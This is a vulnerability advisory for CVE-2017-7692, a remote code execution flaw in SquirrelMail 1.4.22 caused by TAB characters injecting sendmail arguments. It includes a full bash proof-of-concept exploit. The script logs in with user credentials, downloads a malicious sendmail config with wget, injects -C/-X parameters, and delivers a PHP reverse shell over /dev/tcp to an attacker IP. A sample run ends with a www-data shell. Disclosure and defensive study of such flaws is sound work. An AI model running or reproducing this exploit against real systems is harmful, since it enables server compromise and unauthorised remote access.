SquirrelMail 1.4.22 Remote Code Execution

`  
  
__ __ __ __ __   
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________  
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/  
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )   
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/   
/____/   
  
  
Follow @dawid_golunski  
  
  
  
~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~  
Interested in security / vulns / exploits ?  
Check out the new project of the author of this advisory:  
  
ExploitBox.io  
A Playground & Labs for security folks into  
hacking & the art of exploitation  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
  
  
============================================  
- Author: Dawid Golunski  
- dawid[at]legalhackers.com  
- https://legalhackers.com  
  
- CVE-2017-7692  
- Release date: 22.04.2017  
- Revision 1.0  
- Severity: Critical  
=============================================  
  
  
I. VULNERABILITY  
-------------------------  
  
SquirrelMail <= 1.4.22 Remote Code Execution  
  
  
II. BACKGROUND  
-------------------------  
  
"  
SquirrelMail is a standards-based webmail package written in PHP.   
It includes built-in pure PHP support for the IMAP and SMTP protocols, and all  
pages render in pure HTML 4.0 (with no JavaScript required) for maximum   
compatibility across browsers. It has very few requirements and is very easy  
to configure and install. SquirrelMail has all the functionality you would   
want from an email client, including strong MIME support, address books, and  
folder manipulation."  
  
https://squirrelmail.org/about/  
  
III. INTRODUCTION  
-------------------------  
  
SquirrelMail is affected by a critical Remote Code Execution vulnerability  
which stems from insufficient escaping of user-supplied data when   
SquirrelMail has been configured with Sendmail as the main transport.  
An authenticated attacker may be able to exploit the vulnerability  
to execute arbitrary commands on the target and compromise the remote  
system.  
  
IV. DESCRIPTION  
-------------------------  
  
The vulnerability is similar to the following vulnerabilities previously discovered  
by the author of this advisory:  
  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html  
  
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html  
  
  
When SquirrelMail has been configured with Sendmail as delivery transport,  
SquirrelMail uses the following function to send out user emails:  
  
-----[ ./class/deliver/Deliver_SendMail.class.php ]-----  
  
function initStream($message, $sendmail_path, $ignore=0, $ignore='', $ignore='', $ignore='', $ignore='', $ignore=false, $ignore='') {  
$rfc822_header = $message->rfc822_header;  
$from = $rfc822_header->from[0];  
$envelopefrom = trim($from->mailbox.'@'.$from->host);  
$envelopefrom = str_replace(array("\0","\n"),array('',''),$envelopefrom);  
// save executed command for future reference  
$this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";  
// open process handle for writing  
$stream = popen(escapeshellcmd($this->sendmail_command), "w");  
return $stream;  
}  
  
---------------------------------------------------------  
  
  
SquirrelMail allows authenticated users to control envelopefrom (Return-Path) address   
through the webmail web interface.  
  
As we can see it calls str_replace() to sanitize the user input to prevent  
injection of additional parameters to the sendmail command.   
Unfortunately it does not take into account \t (TAB) character which can be  
used by attackers to inject additional parameters.  
  
  
If attacker sets their email address (Return-Path) in the options to  
attacker@localhost -oQ/tmp/ -X/tmp/sqpoc  
  
and then sends a new email.  
The sendmail program will be called with the following arguments:  
  
Arg no. 0 == [/usr/sbin/sendmail]  
Arg no. 1 == [-i]  
Arg no. 2 == [-t]  
Arg no. 3 == [-fattacker@localhost]  
Arg no. 4 == [-oQ/tmp/]  
Arg no. 5 == [-X/tmp/sqpoc]  
  
which will result in /tmp/sqpc file created on disk with email log (-X parameter  
causes sendmail to save the debug/maillog into a file).  
  
  
As demonstrated by the PoC exploit below, attacker can also inject -Cparameter to   
provide a malicious sendmail config file which can be uploaded as an attachment to  
achieve arbitrary command execution.  
  
  
V. PROOF OF CONCEPT EXPLOIT  
-------------------------  
  
  
-----[ SquirrelMail_RCE_exploit.sh ]------  
  
#!/bin/bash  
#  
int='\033[94m  
__ __ __ __ __   
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________  
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/  
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )   
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/   
/____/   
  
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)  
  
SquirrelMail_RCE_exploit.sh (ver. 1.0)  
  
Discovered and coded by   
  
Dawid Golunski (@dawid_golunski)  
https://legalhackers.com  
  
ExploitBox project:  
https://ExploitBox.io  
  
\033[0m'  
  
# Quick and messy PoC for SquirrelMail webmail application.  
# It contains payloads for 2 vectors:  
# * File Write  
# * RCE   
# It requires user credentials and that SquirrelMail uses   
# Sendmail method as email delivery transport  
#  
#  
# Full advisory URL:  
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
#  
# Tested on: # Ubuntu 16.04   
# squirrelmail package version:  
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1   
#  
# Disclaimer:  
# For testing purposes only  
#  
#  
# -----------------------------------------------------------------  
#  
# Interested in vulns/exploitation?   
# Stay tuned for my new project - ExploitBox  
#   
# .;lc'   
# .,cdkkOOOko;.   
# .,lxxkkkkOOOO000Ol'   
# .':oxxxxxkkkkOOOO0000KK0x:'   
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.   
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.   
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.   
# .ddc;,,:c;. ,c: .cxxc:;:ox:   
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:   
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:   
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:   
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:   
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:   
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:   
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:   
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:   
# .dxxxxxdl;. ., .. .;cdxxxxxx:   
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:   
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.   
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.   
# .':oxxxxxxxxx.ckkkkkkkkxl,.   
# .,cdxxxxx.ckkkkkxc.   
# .':odx.ckxl,.   
# .,.'.   
#  
# https://ExploitBox.io  
#  
# https://twitter.com/Exploit_Box  
#  
# -----------------------------------------------------------------  
  
sqspool="/var/spool/squirrelmail/attach/"  
  
echo -e "$int"  
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"  
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"  
#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"  
  
  
# Base URL  
if [ $# -ne 1 ]; then  
echo -e "Usage: \n$0 SquirrelMail_URL"  
echo -e "Example: \n$0 http://target/squirrelmail/ \n"  
  
exit 2  
fi  
URL="$1"  
  
# Log in  
echo -e "\n[*] Enter SquirrelMail user credentials"  
read -p "user: " squser  
read -sp "pass: " sqpass  
  
echo -e "\n\n[*] Logging in to SquirrelMail at $URL"  
curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect  
if [ $? -eq 0 ]; then  
echo "Invalid creds"  
exit 2  
fi  
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"  
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"  
  
  
# Prepare Sendmail cnf  
#  
# * The config will launch php via the following stanza:  
#   
# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,  
# T=DNS/RFC822/X-Unix,  
# A=php -- $u $h ${client_addr}  
#  
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf  
  
# Upload config  
echo -e "\n\n[*] Uploading Sendmail config"  
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"  
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"  
if [ ${#attachid} -lt 32 ]; then  
echo "Something went wrong. Failed to upload the sendmail file."  
exit 2  
fi  
  
# Create Sendmail cmd string according to selected payload  
echo -e "\n\n[?] Select payload\n"  
# SELECT PAYLOAD  
echo "1 - File write (into /tmp/sqpoc)"  
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"  
echo  
read -p "[1-2] " pchoice  
  
case $pchoice in  
1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"   
;;  
  
2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"   
;;  
esac  
  
if [ $pchoice -eq 2 ]; then  
echo  
read -p "Reverese shell IP: " reverse_ip  
read -p "Reverese shell PORT: " reverse_port  
fi  
  
# Reverse shell code  
phprevsh="  
<?php   
\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";  
file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);  
system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");  
?>"  
  
  
# Set sendmail params in user settings  
echo -e "\n[*] Injecting Sendmail command parameters"  
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"  
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null  
if [ $? -ne 0 ]; then  
echo "Failed to inject sendmail parameters"  
exit 2  
fi  
  
# Send email which triggers the RCE vuln and runs phprevsh  
echo -e "\n[*] Sending the email to trigger the vuln"  
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \  
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &  
  
if [ $pchoice -eq 2 ]; then  
echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"  
nc -vv -l -p $reverse_port  
else  
echo -e "\n[*] The test file should have been written at /tmp/sqpoc"  
fi  
  
grep -q "302 Found" /tmp/sheaders  
if [ $? -eq 1 ]; then  
echo "There was a problem with sending email"  
exit 2  
fi  
  
  
# Done  
echo -e "\n[*] All done. Exiting"  
  
  
  
-------[ EOF ]--------  
  
  
  
Example run:  
~~~~~~~~~~~~  
  
$ ./SquirrelMail_RCE_exploit.sh http://xenial/squirrelmail/  
  
__ __ __ __ __   
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________  
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/  
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )   
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/   
/____/   
  
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)  
  
SquirrelMail_RCE_exploit.sh (ver. 1.0)  
  
Discovered and coded by   
  
Dawid Golunski (@dawid_golunski)  
https://legalhackers.com  
  
ExploitBox project:  
https://ExploitBox.io  
  
  
  
[*] Enter SquirrelMail user credentials  
user: attacker  
pass:   
  
[*] Logging in to SquirrelMail at http://xenial/squirrelmail/  
  
  
[*] Uploading Sendmail config  
  
  
[?] Select payload  
  
1 - File write (into /tmp/sqpoc)  
2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)  
  
[1-2] 2  
  
Reverese shell IP: 192.168.57.1  
Reverese shell PORT: 1337  
  
[*] Injecting Sendmail command parameters  
  
[*] Sending the email to trigger the vuln  
  
[*] Waiting for shell on 192.168.57.1 port 1337  
Listening on [0.0.0.0] (family 0, port 1337)  
Connection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport 60608)  
bash: cannot set terminal process group (12208): Inappropriate ioctl for device  
bash: no job control in this shell  
www-data@vulnsys:/tmp$ id   
id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
www-data@vulnsys:/tmp$ dpkg -l | grep squirrelmail  
dpkg -l | grep squirrelmail  
ii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1 all Webmail for nuts  
www-data@vulnsys:/tmp$ exit  
exit  
exit  
  
[*] All done. Exiting  
  
  
Video PoC:  
~~~~~~~~~~~~  
  
https://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
  
  
  
VI. BUSINESS IMPACT  
-------------------------  
  
A successful exploitation could let remote attackers to gain access to   
the target server in the context of the web server account which could  
lead to a full compromise of the web application.  
  
  
VII. SYSTEMS AFFECTED  
-------------------------  
  
The latest version of SquirrelMail 1.4.22 and below are affected.  
  
VIII. SOLUTION / VENDOR RESPONSE  
-------------------------  
  
The vulnerability was first reported to SquirrelMail vendor by the  
author of this advisory which resulted in CVE-ID (2017-5181) issued on 4th  
January. The vendor requested more time due to personal issues.   
  
The vulnerability was however discovered and published in April by another   
researcher on full-disclosure list which triggered the release  
of this advisory without an official solution available.  
  
As a temporary solution users can switch to SMTP based transport (as   
opposed to Sendmail).  
  
As advised by MITRE, this vulnerability should now be tracked under the   
new CVEID - CVE-2017-7692.  
  
Vendor has been advised that the isue is now public. No response has been  
received yet.  
  
IX. REFERENCES  
-------------------------  
  
https://legalhackers.com  
  
https://ExploitBox.io  
  
This / CVE-2017-7692 advisory URL:  
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
  
Video PoC exploit:  
https://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
  
Exploit code:  
The simple PoC shown above is available here:  
https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh  
https://legalhackers.com/exploits/sendmail-exploit.cnf  
  
CVE-2017-7692  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7692  
  
Vendor site:  
https://squirrelmail.org  
  
Related OSS-SECURITY /full-disclosure messages:  
http://seclists.org/fulldisclosure/2017/Apr/89  
http://www.openwall.com/lists/oss-security/2017/04/19/7  
  
  
  
Similar vulnerabilities discovered by the author (PHPMailer & SwiftMailer):  
  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html  
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html  
  
  
X. CREDITS  
-------------------------  
  
The vulnerability was first discovered/reported by Dawid Golunski  
dawid (at) legalhackers (dot) com  
https://legalhackers.com  
  
Filippo Cavallarin, who also reported the vulnerability at a later date   
(see the oss-security thread referenced below for details)  
  
  
XI. REVISION HISTORY  
-------------------------  
  
22.04.2017 - Advisory released  
  
  
XII. LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this information.  
`